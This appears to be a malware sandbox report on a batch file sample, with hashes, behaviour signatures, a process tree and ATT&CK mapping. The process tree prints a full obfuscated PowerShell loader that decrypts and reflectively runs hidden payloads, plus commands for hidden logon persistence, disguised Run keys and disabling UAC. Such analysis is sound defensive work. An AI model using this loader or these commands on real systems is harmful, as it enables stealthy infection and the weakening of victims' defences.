Analysis
-
max time kernel
96s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2024, 10:43
Static task
static1
Behavioral task
behavioral1
Sample
new.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
new.bat
Resource
win10v2004-20241007-en
General
-
Target
new.bat
-
Size
1.9MB
-
MD5
236a30633019cf4b67db32def072c413
-
SHA1
e6b3f1a0ee7d09f3fa1f99ae9e2e7714c027e82e
-
SHA256
887a311306a54b0f98ef67a1dbf32734e2e92a3572b6f4300231eaee7f5ecb84
-
SHA512
2eba2aa0126985c6ac16bea71db4d719ad3da5fad446facae2801bd5f5167d8881121a39d79e13162240a19821f09147eca315efd8409a8a2778e4b33a6d8e3e
-
SSDEEP
24576:wxVq/CkT1yUMC2HFVn0+KynwyPXH8sMY4HU+MIQif3dOqKyPvaQaPjrjwVs6M3KL:w7gcjCOH8WmUKtdXUGjn
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 512 powershell.exe 2724 powershell.exe 1732 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1276 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 512 powershell.exe 512 powershell.exe 2724 powershell.exe 2724 powershell.exe 1732 powershell.exe 1732 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 512 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeIncreaseQuotaPrivilege 2724 powershell.exe Token: SeSecurityPrivilege 2724 powershell.exe Token: SeTakeOwnershipPrivilege 2724 powershell.exe Token: SeLoadDriverPrivilege 2724 powershell.exe Token: SeSystemProfilePrivilege 2724 powershell.exe Token: SeSystemtimePrivilege 2724 powershell.exe Token: SeProfSingleProcessPrivilege 2724 powershell.exe Token: SeIncBasePriorityPrivilege 2724 powershell.exe Token: SeCreatePagefilePrivilege 2724 powershell.exe Token: SeBackupPrivilege 2724 powershell.exe Token: SeRestorePrivilege 2724 powershell.exe Token: SeShutdownPrivilege 2724 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeSystemEnvironmentPrivilege 2724 powershell.exe Token: SeRemoteShutdownPrivilege 2724 powershell.exe Token: SeUndockPrivilege 2724 powershell.exe Token: SeManageVolumePrivilege 2724 powershell.exe Token: 33 2724 powershell.exe Token: 34 2724 powershell.exe Token: 35 2724 powershell.exe Token: 36 2724 powershell.exe Token: SeIncreaseQuotaPrivilege 2724 powershell.exe Token: SeSecurityPrivilege 2724 powershell.exe Token: SeTakeOwnershipPrivilege 2724 powershell.exe Token: SeLoadDriverPrivilege 2724 powershell.exe Token: SeSystemProfilePrivilege 2724 powershell.exe Token: SeSystemtimePrivilege 2724 powershell.exe Token: SeProfSingleProcessPrivilege 2724 powershell.exe Token: SeIncBasePriorityPrivilege 2724 powershell.exe Token: SeCreatePagefilePrivilege 2724 powershell.exe Token: SeBackupPrivilege 2724 powershell.exe Token: SeRestorePrivilege 2724 powershell.exe Token: SeShutdownPrivilege 2724 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeSystemEnvironmentPrivilege 2724 powershell.exe Token: SeRemoteShutdownPrivilege 2724 powershell.exe Token: SeUndockPrivilege 2724 powershell.exe Token: SeManageVolumePrivilege 2724 powershell.exe Token: 33 2724 powershell.exe Token: 34 2724 powershell.exe Token: 35 2724 powershell.exe Token: 36 2724 powershell.exe Token: SeIncreaseQuotaPrivilege 2724 powershell.exe Token: SeSecurityPrivilege 2724 powershell.exe Token: SeTakeOwnershipPrivilege 2724 powershell.exe Token: SeLoadDriverPrivilege 2724 powershell.exe Token: SeSystemProfilePrivilege 2724 powershell.exe Token: SeSystemtimePrivilege 2724 powershell.exe Token: SeProfSingleProcessPrivilege 2724 powershell.exe Token: SeIncBasePriorityPrivilege 2724 powershell.exe Token: SeCreatePagefilePrivilege 2724 powershell.exe Token: SeBackupPrivilege 2724 powershell.exe Token: SeRestorePrivilege 2724 powershell.exe Token: SeShutdownPrivilege 2724 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeSystemEnvironmentPrivilege 2724 powershell.exe Token: SeRemoteShutdownPrivilege 2724 powershell.exe Token: SeUndockPrivilege 2724 powershell.exe Token: SeManageVolumePrivilege 2724 powershell.exe Token: 33 2724 powershell.exe Token: 34 2724 powershell.exe Token: 35 2724 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 920 wrote to memory of 3512 920 cmd.exe 83 PID 920 wrote to memory of 3512 920 cmd.exe 83 PID 3512 wrote to memory of 3024 3512 net.exe 84 PID 3512 wrote to memory of 3024 3512 net.exe 84 PID 920 wrote to memory of 512 920 cmd.exe 85 PID 920 wrote to memory of 512 920 cmd.exe 85 PID 920 wrote to memory of 512 920 cmd.exe 85 PID 512 wrote to memory of 2724 512 powershell.exe 88 PID 512 wrote to memory of 2724 512 powershell.exe 88 PID 512 wrote to memory of 2724 512 powershell.exe 88 PID 512 wrote to memory of 688 512 powershell.exe 94 PID 512 wrote to memory of 688 512 powershell.exe 94 PID 512 wrote to memory of 688 512 powershell.exe 94 PID 688 wrote to memory of 2424 688 WScript.exe 95 PID 688 wrote to memory of 2424 688 WScript.exe 95 PID 688 wrote to memory of 2424 688 WScript.exe 95 PID 2424 wrote to memory of 3076 2424 cmd.exe 97 PID 2424 wrote to memory of 3076 2424 cmd.exe 97 PID 2424 wrote to memory of 3076 2424 cmd.exe 97 PID 3076 wrote to memory of 3936 3076 net.exe 98 PID 3076 wrote to memory of 3936 3076 net.exe 98 PID 3076 wrote to memory of 3936 3076 net.exe 98 PID 2424 wrote to memory of 1732 2424 cmd.exe 101 PID 2424 wrote to memory of 1732 2424 cmd.exe 101 PID 2424 wrote to memory of 1732 2424 cmd.exe 101 PID 1732 wrote to memory of 3500 1732 powershell.exe 102 PID 1732 wrote to memory of 3500 1732 powershell.exe 102 PID 1732 wrote to memory of 3500 1732 powershell.exe 102 PID 3500 wrote to memory of 1276 3500 cmd.exe 104 PID 3500 wrote to memory of 1276 3500 cmd.exe 104 PID 3500 wrote to memory of 1276 3500 cmd.exe 104 PID 1732 wrote to memory of 2768 1732 powershell.exe 105 PID 1732 wrote to memory of 2768 1732 powershell.exe 105 PID 1732 wrote to memory of 2768 1732 powershell.exe 105
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\new.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:3024
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PefENtrEWn6/3Gb6BPDcI3rjn7pIfdMk59QqDe4xono='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E1wVFE5p/6sBikVLqwAjJA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xtIOE=New-Object System.IO.MemoryStream(,$param_var); $FIKWC=New-Object System.IO.MemoryStream; $dJbPC=New-Object System.IO.Compression.GZipStream($xtIOE, [IO.Compression.CompressionMode]::Decompress); $dJbPC.CopyTo($FIKWC); $dJbPC.Dispose(); $xtIOE.Dispose(); $FIKWC.Dispose(); $FIKWC.ToArray();}function execute_function($param_var,$param2_var){ $wsCHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TzOAT=$wsCHa.EntryPoint; $TzOAT.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\new.bat';$bkxAZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\new.bat').Split([Environment]::NewLine);foreach ($fgUKd in $bkxAZ) { if ($fgUKd.StartsWith(':: ')) { $dXmqj=$fgUKd.Substring(3); break; }}$payloads_var=[string[]]$dXmqj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_221_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_221.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_221.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_221.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\net.exenet file5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 file6⤵
- System Location Discovery: System Language Discovery
PID:3936
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PefENtrEWn6/3Gb6BPDcI3rjn7pIfdMk59QqDe4xono='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('E1wVFE5p/6sBikVLqwAjJA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xtIOE=New-Object System.IO.MemoryStream(,$param_var); $FIKWC=New-Object System.IO.MemoryStream; $dJbPC=New-Object System.IO.Compression.GZipStream($xtIOE, [IO.Compression.CompressionMode]::Decompress); $dJbPC.CopyTo($FIKWC); $dJbPC.Dispose(); $xtIOE.Dispose(); $FIKWC.Dispose(); $FIKWC.ToArray();}function execute_function($param_var,$param2_var){ $wsCHa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TzOAT=$wsCHa.EntryPoint; $TzOAT.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_221.bat';$bkxAZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_221.bat').Split([Environment]::NewLine);foreach ($fgUKd in $bkxAZ) { if ($fgUKd.StartsWith(':: ')) { $dXmqj=$fgUKd.Substring(3); break; }}$payloads_var=[string[]]$dXmqj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Adds policy Run key to start application
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1276
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"6⤵
- System Location Discovery: System Language Discovery
PID:2768
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
Filesize
17KB
MD5c64c7a3d01e92dd5e31be75c72f3b409
SHA11ffe2e78ac006e49475f7f1ce60ed0c0b603c1a2
SHA2564f6e63576f05cf4c2578fa465b1bbb4b9725131126b50a18048b26c5f3eee1fe
SHA5123e758773e7986166309fd42c952ee5fdaafc58ec63c6f1f559baef9ce6245bc915cfa3df7a155fb4e8f5c6a1e5f9856ae914bc0f3a0e759dc0c0ea109dd2451e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
564B
MD57b5b515f4b08420b67534d2b693a2c80
SHA1b628f9f83a8f7cfe5dd75f69c33173826d7edd0b
SHA2568f74abab218dda99f4778abc04c1106a4aa6a7d352894394299fb7265b5cad2e
SHA512f8339c237d982d6c99dc42954b70f5750b88d96123f52afd35d14b4414fa1d6af192f7500483a340d7c1c747ac894c5f5bd61c3503c30e7e092c4fc900cc595b
-
Filesize
1.9MB
MD5236a30633019cf4b67db32def072c413
SHA1e6b3f1a0ee7d09f3fa1f99ae9e2e7714c027e82e
SHA256887a311306a54b0f98ef67a1dbf32734e2e92a3572b6f4300231eaee7f5ecb84
SHA5122eba2aa0126985c6ac16bea71db4d719ad3da5fad446facae2801bd5f5167d8881121a39d79e13162240a19821f09147eca315efd8409a8a2778e4b33a6d8e3e
-
Filesize
115B
MD50c2ba0bf4f64fd4f613a1ebf9da5dfc9
SHA1d9b92f1982d79d3fc7d2d2b046d3b78f3acacd50
SHA256d696ad3ceaceb8d2df4e14f277db01d916262a0d31ee02cdfe2af72c8385fd17
SHA512a7dfc485328670271ac2b6d1d0318bfa6167c6e3d2b90b6ab6041d14797d15e21b9ed8bbd3b4e33e332015669c31e905702f29de9184880ba47de11876be4c2e